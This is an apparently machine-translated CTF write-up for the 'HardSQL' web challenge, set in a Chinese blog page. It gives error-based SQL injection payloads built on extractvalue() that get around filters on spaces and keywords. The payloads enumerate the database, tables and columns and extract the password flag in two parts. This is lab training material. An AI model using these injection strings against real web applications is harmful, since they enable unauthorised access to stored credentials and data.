当前位置:网站首页>[geek Challenge 2019] hardsql
[geek Challenge 2019] hardsql
2022-06-23 09:19:00 【K00sec】
[Le défi des geeks 2019]HardSQL
Plusieurs méthodes couramment utilisées ont été essayées,Espace trouvé,or,and,union,order byBeaucoup ont été filtrés.

Essayez l'injection d'erreur,Je n'ai pas vérifié Baidu directement pour voir,Ensuite, utilisez extractvalue() Fonction trouvée non filtrée.


# Explosion de la base de données actuelle
?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(database())))))%23 # Fiche technique de dynamitage ?username=asdasdasda&password=2'-extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('%geek%')))))%23
## '~H4rDsq1'
# Champ d'explosion
?username=asdasdasda&password=2'-extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('%H4rDsq1%')))))%23 ## '~id,username,password' # À gauche. 30Valeur du BIT ## extractvalue() Valeur maximale de retour de la fonction 32 Il faut donc left() Ou right() Fonctions, Couper à gauche ou à droite ,Encore un épissage. ?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(left(password,31))from(H4rDsq1)))))%23
## 'flag{4e949b07-99eb-4fec-ae1b-17'
# La valeur à droite de la tempête
?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(right(password,15))from(H4rDsq1)))))%23 ## '~b-173bd90bdf56}' # 'Finalflag:flag{
4e949b07-99eb-4fec-ae1b-173bd90bdf56}'
边栏推荐
- Redis学习笔记—地理信息定位(GEO)
- Redis学习笔记—数据类型:字符串(string)
- A method of realizing video call and interactive live broadcast in small programs
- Utilisation du cookie du module de demande de noeud
- Correspondence between three-tier architecture and SSM
- Structure binary tree from inorder and postorder traversal for leetcode topic analysis
- Redis learning notes - single key management
- Redis学习笔记—客户端通讯协议RESP
- Redis learning notes pipeline
- Servlet-02 生命周期
猜你喜欢
![[event registration] sofastack × CSDN jointly held the open source series meetup, which was launched on June 24](/img/e1/97c92290a2a5e68f05cdbd5bf525e8.png)
[event registration] sofastack × CSDN jointly held the open source series meetup, which was launched on June 24
![[CISCN2019 华北赛区 Day2 Web1]Hack World](/img/bf/51a24fd2f9f0e13dcd821b327b5a00.png)
[CISCN2019 华北赛区 Day2 Web1]Hack World

Flink error --caused by: org apache. calcite. sql. parser. SqlParseException: Encountered “time“

A 32KB cache with direct mapping Memory exercises after class

Quartz Crystal Drive Level Calculation

多线程初学

UEFI源码学习3.7 - NorFlashDxe

Learn SCI thesis drawing skills (E)

16.系统启动流程
Redis学习笔记—持久化机制之AOF
随机推荐
自定义标签——jsp标签增强
Common English explanations in arm
披萨订购设计----简单工厂模式
简易学生管理
Unity grid programming 06
Mysql 数据库入门总结
Simple student management
RGB与CMYK颜色模式
Redis学习笔记—事务
Redis learning notes - publish and subscribe
Vue3表单页面利用keep-alive缓存数据的一种思路
【NanoPi2试用体验】裸机第一步
UCOSII (learning notes)
自定义标签——jsp标签基础
使用base64,展示图片
Redis learning notes - data type: ordered set (Zset)
Combination sum of leetcode topic analysis
[GXYCTF2019]BabyUpload
Redis学习笔记—持久化机制之AOF
Lua的基本使用